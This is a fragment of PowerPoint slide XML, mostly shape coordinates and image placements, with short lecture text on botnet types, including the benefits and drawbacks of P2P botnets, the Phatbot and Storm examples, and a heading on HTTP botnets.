                    <a:pt x="2177415" y="238125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147697" y="362458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2184768" y="353834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2193671" y="392303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2230755" y="383667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2221839" y="345198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258949" y="336550"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="2291207" y="643382"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2256663" y="494919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2219579" y="503555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2254123" y="652018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2291207" y="643382"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="2838450" y="709549"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2783586" y="609346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2710815" y="714375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2838450" y="709549"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="2939288" y="781558"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2921000" y="748157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2787396" y="821436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2805684" y="854837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2939288" y="781558"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3008884" y="572643"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2990596" y="539242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2856992" y="612521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2875280" y="645922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3008884" y="572643"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3173095" y="653288"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3154807" y="619887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3021203" y="693166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3039491" y="726567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3173095" y="653288"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3242818" y="444500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3224530" y="411099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3090799" y="484378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3109214" y="517779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3242818" y="444500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3247898" y="2127250"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3164967" y="1999361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3132963" y="2020189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3215894" y="2147951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3247898" y="2127250"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3392932" y="2351024"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3310001" y="2223135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3278124" y="2243963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3360928" y="2371852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3392932" y="2351024"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3406902" y="525018"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3388614" y="491617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3255010" y="564896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3273298" y="598297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3406902" y="525018"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3412744" y="2072513"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3301365" y="2009775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3318002" y="2136521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3412744" y="2072513"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3475609" y="2233549"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3390265" y="2107184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3358642" y="2128520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3443986" y="2254885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475609" y="2233549"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3476752" y="316357"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3458337" y="282956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324733" y="356235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343021" y="389636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3476752" y="316357"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3538093" y="2574798"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3455162" y="2446909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423158" y="2467737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3506089" y="2595626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3538093" y="2574798"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3577590" y="409575"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3449828" y="414401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3504819" y="514604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3577590" y="409575"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3624961" y="2454402"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3539617" y="2328164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3507994" y="2349500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3593465" y="2475738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3624961" y="2454402"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3694430" y="1171206"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3658870" y="1062609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3568065" y="1152525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430" y="1171206"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3710559" y="188214"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3692271" y="154686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3558667" y="227965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3576955" y="261366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3710559" y="188214"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3710940" y="2876550"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3703142" y="2806954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3696716" y="2749550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3664762" y="2770289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3600196" y="2670810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3568192" y="2691511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3632784" y="2791041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3600831" y="2811780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3710940" y="2876550"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3774313" y="2675382"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3688969" y="2549144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3657473" y="2570480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3742817" y="2696718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3774313" y="2675382"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3827653" y="1414780"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3710940" y="1466850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3822573" y="1528953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3827653" y="1414780"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3854577" y="1579118"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3702304" y="1571625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3700526" y="1609725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3852672" y="1617218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3854577" y="1579118"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3894074" y="1065530"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3882136" y="1029335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737356" y="1076833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3749167" y="1113028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3894074" y="1065530"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="3988816" y="1460119"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3836543" y="1453388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3834892" y="1491361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3987038" y="1498092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3988816" y="1460119"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="4120896" y="1592199"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3968750" y="1584706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3966845" y="1622806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4119118" y="1630172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4120896" y="1592199"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="4147439" y="982218"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4135501" y="946023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3990721" y="993648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4002659" y="1029843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4147439" y="982218"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="4255262" y="1471803"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4102989" y="1465072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4101338" y="1503172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4253484" y="1509903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4255262" y="1471803"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="4387342" y="1605280"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4235069" y="1597787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4233291" y="1635760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4385437" y="1643253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4387342" y="1605280"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="4400804" y="899033"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4388866" y="862838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4244086" y="910336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4256024" y="946531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4400804" y="899033"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="4521708" y="1483614"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4369435" y="1476883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4367784" y="1514983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4519930" y="1521714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4521708" y="1483614"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="4640326" y="1652651"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4576953" y="1652651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4557801" y="1652651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4555985" y="1689735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4640326" y="1652651"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="4654169" y="815721"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4642231" y="779526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4497438" y="827151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4509389" y="863346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4654169" y="815721"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="4672965" y="1638300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4561586" y="1575562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4559719" y="1613649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4501515" y="1610868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4499610" y="1648841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4557852" y="1651711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4576991" y="1651711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4642459" y="1651711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4672965" y="1638300"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="4788154" y="1495425"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4635881" y="1488694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4634230" y="1526794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4786376" y="1533525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4788154" y="1495425"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4907915" h="2876550">
                  <a:moveTo>
                    <a:pt x="4907534" y="732409"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4895596" y="696214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4750816" y="743839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4762754" y="780034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4907534" y="7324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p/>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="47" name="object 23"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId33"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId34" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7747000" y="1985962"/>
              <a:ext cx="1130300" cy="836612"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48" name="object 24"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId35"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId36" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="200025" y="2398712"/>
              <a:ext cx="1735201" cy="1157287"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49" name="object 25"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId37"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId36" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4410075" y="912812"/>
              <a:ext cx="1735201" cy="1157287"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50" name="object 26"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId38"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId36" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2228850" y="5608636"/>
              <a:ext cx="1735201" cy="1157287"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="51" name="object 27"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId39"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId36" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6324600" y="4608512"/>
              <a:ext cx="1735201" cy="1157287"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="52" name="object 28"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId40"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId36" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2247900" y="1141412"/>
              <a:ext cx="1735201" cy="1157287"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="53" name="object 29"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId41"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId36" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="4494212"/>
              <a:ext cx="1735201" cy="1157287"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="54" name="object 30"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId42"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId36" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4238625" y="5389562"/>
              <a:ext cx="1735201" cy="11572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Types Botnets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745" y="1022350"/>
            <a:ext cx="2552700" cy="4959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P2P botnets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4133215" y="1098550"/>
            <a:ext cx="7701915" cy="1169035"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9805"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202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3020" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="4204335" algn="l"/>
              </a:tabLst>
            </a:pP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P2P communication channels offer anonymity to botherders a and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resiliency to botnets.</a:t>
            </a:r>
            <a:endParaRPr sz="2600" b="1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6" name="object 2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340995" y="2407285"/>
            <a:ext cx="11128375" cy="3858260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="135534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4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Benefits of P2P to botherder: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Decentralized; No single point of failure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Botherder can send commands from any peer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Security by Obscurity; There is no P2P RF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4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Drawbacks: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Other peers can potentially take over the botnet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4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P2P Bots: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Phatbot: AOL’s WASTE protocol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Storm: Overnet/eDonkey P2P protocol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Types Botnets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745" y="1022350"/>
            <a:ext cx="4241800" cy="4959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/>
            <a:r>
              <a:rPr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HTTP botnet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" name="object 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1524000" y="0"/>
            <a:ext cx="9144000" cy="5762625"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9144000" cy="5762625"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="object 3"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4534659" y="1450414"/>
              <a:ext cx="796303" cy="490537"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="object 4"/>
            <p:cNvPicPr/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3200400" y="1300162"/>
              <a:ext cx="1735201" cy="1157287"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="object 5"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6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609600" y="1066800"/>
              <a:ext cx="1566926" cy="1162050"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="object 6"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8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590550" y="2041525"/>
              <a:ext cx="2066925" cy="1377950"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="28" name="object 7"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10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2762250" y="2438400"/>
              <a:ext cx="3157601" cy="2105025"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="object 8"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId12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6525800" y="2614195"/>
              <a:ext cx="1050188" cy="890013"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30" name="object 9"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId14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2209800" y="4505325"/>
              <a:ext cx="1884426" cy="1257300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31" name="object 10"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId16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410200" y="3660775"/>
              <a:ext cx="2751074" cy="1835150"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="object 11"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId18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819900" y="2716212"/>
              <a:ext cx="769937" cy="512762"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId20"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2047875" y="2688970"/>
              <a:ext cx="4717415" cy="477520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4717415" h="477519">
                  <a:moveTo>
                    <a:pt x="184150" y="55245"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="115341" y="36830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116674" y="31877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125222" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="25654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95631" y="110363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105473" y="73634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174244" y="92075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184150" y="55245"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
